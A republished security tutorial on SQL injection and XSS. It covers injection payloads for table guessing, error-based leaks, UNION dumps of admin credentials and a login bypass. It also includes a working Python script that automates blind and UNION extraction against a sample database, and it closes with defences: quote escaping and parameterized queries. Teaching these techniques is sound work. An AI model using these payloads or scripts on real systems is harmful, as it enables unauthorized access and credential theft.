How Attackers Exploit SQL Injection and XSS – Techniques and Defenses
This article explains the mechanics of SQL injection and XSS attacks, demonstrates common exploitation methods such as table‑name guessing, error‑based and union queries, shows a vulnerable authentication script, and provides practical defensive coding techniques to mitigate these threats.
SQL injection occurs when an attacker inserts malicious SQL commands into web forms, URL parameters, or other input fields, causing the server to execute unintended queries; this often leads to credential leaks or full database compromise.
Typical exploitation steps include:
Guessing table names using payloads like AND (SELECT COUNT(*) FROM table_name)<>0.
Guessing column names with AND (SELECT COUNT(column_name) FROM table_name)<>0.
Using AND EXISTS (SELECT * FROM table_name) to confirm existence.
Leveraging error‑based techniques, e.g., AND user>0: on SQL Server, user returns the current database user name as a string, so comparing it with an integer forces a type conversion whose error message echoes the value back to the attacker.
Employing UNION‑based queries: first ORDER BY 10 (lowering the number until the query stops erroring) to learn how many columns the original SELECT returns, then AND 1=2 UNION SELECT 1,2,3,user,passwd FROM admin to have the credential columns rendered in the page.
Performing ASCII‑brute‑force attacks by iteratively checking character codes, e.g., AND (SELECT TOP 1 ASC(MID(user,1,1)) FROM admin)>100, to reconstruct strings like usernames and passwords.
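The five steps above, carried out end to end against a constructed SQLite database, as an added example that is not code from the article. The vulnerable endpoint concatenates a numeric URL parameter into a SELECT, the way a show.asp?id= page would; the news table, the admin table and its credentials are constructed sample data. The article's Access/SQL Server syntax (TOP 1, ASC, MID) is translated into SQLite equivalents (LIMIT 1, unicode, substr), and the character search uses a binary search rather than the one-code-at-a-time probing the article describes. SQLite has no conversion-error leak comparable to AND user>0, so that step is not reproduced.

```python
import sqlite3

# Constructed sample database (not from the article): a small news site whose
# back end also holds an admin table with plaintext credentials.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
        INSERT INTO news VALUES (2, 'Update', 'Second post');
        CREATE TABLE admin(id INTEGER PRIMARY KEY, user TEXT, passwd TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'S3cret!');
    """)
    return conn

# The vulnerable endpoint: the id parameter is concatenated straight into SQL.
# Returns the rows, or None when the injected SQL makes the query fail.
def vulnerable_show(conn, id_param):
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None

# Boolean oracle: does the page still render news item 1 with this condition appended?
def page_true(conn, injected):
    return bool(vulnerable_show(conn, "1 " + injected))

# Steps 1-2: guess table and column names with the article's COUNT probes.
def table_exists(conn, name):
    return page_true(conn, f"AND (SELECT COUNT(*) FROM {name})<>0")

def column_exists(conn, table, col):
    return page_true(conn, f"AND (SELECT COUNT({col}) FROM {table})<>0")

# Step 3: ORDER BY n errors once n exceeds the column count of the original SELECT.
def column_count(conn, max_cols=10):
    for n in range(1, max_cols + 1):
        if vulnerable_show(conn, f"1 ORDER BY {n}") is None:
            return n - 1
    return max_cols

# Step 3 continued: a false WHERE plus UNION puts the wanted columns in the page.
def union_dump(conn, table, cols):
    filler = ["1"] * (column_count(conn) - len(cols))   # pad to the right column count
    rows = vulnerable_show(conn, f"0 UNION SELECT {','.join(cols + filler)} FROM {table}")
    return [tuple(r[:len(cols)]) for r in rows]

# Step 4: when UNION output is not visible, recover a string one character at a
# time through the boolean oracle. The article's Access payload
#   AND (SELECT TOP 1 ASC(MID(user,1,1)) FROM admin)>100
# becomes unicode(substr(...)) with LIMIT 1 here; each character costs ~7 probes.
def bruteforce_string(conn, table, col, max_len=32):
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"AND (SELECT unicode(substr({col},{pos},1)) FROM {table} LIMIT 1)>{mid}"
            if page_true(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # substr past the end yields '' -> unicode('') is NULL -> every probe false
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = make_db()
    print("admin table present:", table_exists(db, "admin"))
    print("columns in page query:", column_count(db))
    print("union dump:", union_dump(db, "admin", ["user", "passwd"]))
    print("brute-forced passwd:", bruteforce_string(db, "admin", "passwd"))
```

Each probe is a full page request in the real attack, which is why attackers prefer the UNION route whenever the page echoes a column and fall back to character-by-character inference only when it does not.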
Backend authentication bypass often relies on a logic flaw: submitting ' or 'a'='a in the username or password field turns the WHERE clause into a condition that is always true. Two things must hold for the bypass to succeed: the vulnerable code must check username and password in a single concatenated SQL statement, and the password must be compared as submitted (stored in plain text, or at least not hashed before it reaches the query), because hashing the input first would neutralize the payload in that field.
Example of vulnerable code:
user = request("user")
passwd = request("passwd")
sql = "select admin from adminbate where user='" & user & "' and passwd='" & passwd & "'"
By submitting ' or 'a'='a as the username and password, the WHERE clause becomes user='' or 'a'='a' and passwd='' or 'a'='a', which is always true, granting unauthorized access.
Defensive measures include input sanitization and the use of a safe request function that validates parameter types and escapes single quotes. A typical implementation in VBScript:
Function SafeRequest(ParaName, ParaType) 'ParaName: parameter name, ParaType: 1 for numeric, 0 for string
Dim ParaValue
ParaValue = Request(ParaName)
If ParaType = 1 Then
If Not IsNumeric(ParaValue) Then
Response.Write "Parameter " & ParaName & " must be numeric!"
Response.End
End If
Else
ParaValue = Replace(ParaValue, "'", "''")
End If
SafeRequest = ParaValue
End Function
All user inputs should be passed through SafeRequest() before being incorporated into SQL statements. Two caveats apply: doubling single quotes only protects values that sit inside quoted string literals, so numeric parameters must go through the ParaType = 1 branch rather than the escaping branch; and escaping is a mitigation, not a structural fix. Where the data access layer allows it, binding values as parameters (ADODB.Command with CreateParameter in classic ASP) instead of concatenating strings removes the injection path entirely.
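The login bypass described above and the SafeRequest-style escaping fix, side by side with a parameterized query, as an added example in Python over SQLite (not the article's ASP code). The adminbate table, its single row and the S3cret! password are constructed sample data; the variant that appends a -- comment to the username goes beyond the article's payload and is included to show why the article says both checks must sit in one statement.

```python
import sqlite3

# Constructed sample data (not from the article): one admin row with a plaintext
# password, which is the storage assumption the bypass relies on.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE adminbate(admin TEXT, user TEXT, passwd TEXT)")
    conn.execute("INSERT INTO adminbate VALUES ('yes', 'admin', 'S3cret!')")
    return conn

# 1. The article's vulnerable login, transliterated: both fields are concatenated
#    into one statement, so either field can rewrite the WHERE clause.
def login_vulnerable(conn, user, passwd):
    sql = ("select admin from adminbate where user='" + user
           + "' and passwd='" + passwd + "'")
    return conn.execute(sql).fetchone() is not None

# 2. SafeRequest in Python: reject non-numeric values for numeric parameters,
#    double single quotes for string parameters.
def safe_request(value, numeric):
    if numeric:
        # Stricter than VBScript's IsNumeric, which also accepts forms like "1e3".
        if not value.isdigit():
            raise ValueError("parameter must be numeric")
        return value
    return value.replace("'", "''")

def login_escaped(conn, user, passwd):
    sql = ("select admin from adminbate where user='" + safe_request(user, False)
           + "' and passwd='" + safe_request(passwd, False) + "'")
    return conn.execute(sql).fetchone() is not None

# 3. Parameterized query: the driver sends the values separately from the
#    statement text, so no quoting trick can change the query's structure.
def login_parameterized(conn, user, passwd):
    sql = "select admin from adminbate where user=? and passwd=?"
    return conn.execute(sql, (user, passwd)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    payload = "' or 'a'='a"
    for name, fn in [("vulnerable", login_vulnerable), ("escaped", login_escaped),
                     ("parameterized", login_parameterized)]:
        print(f"{name:13s} bypass succeeds: {fn(db, payload, payload)}")
```

With the vulnerable function, the payload in the password field alone is enough because AND binds tighter than OR: user='x' and passwd='' or 'a'='a' is true for every row. The same payload in the username field alone fails, since the trailing and passwd='x' still has to match; it only works again when the rest of the statement is commented out with --.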
XSS (Cross‑Site Scripting) is another web‑application threat where attackers inject malicious HTML/JavaScript into pages viewed by victims. The article briefly outlines internal vs. external XSS vectors and mentions using crafted XSS pages to steal cookies or execute shell commands, noting that while the technique is dated, understanding it helps improve overall security posture.
This article has been distilled and summarized from source material, then republished for learning and reference.
ITPUB
Official ITPUB account sharing technical insights, community news, and exciting events.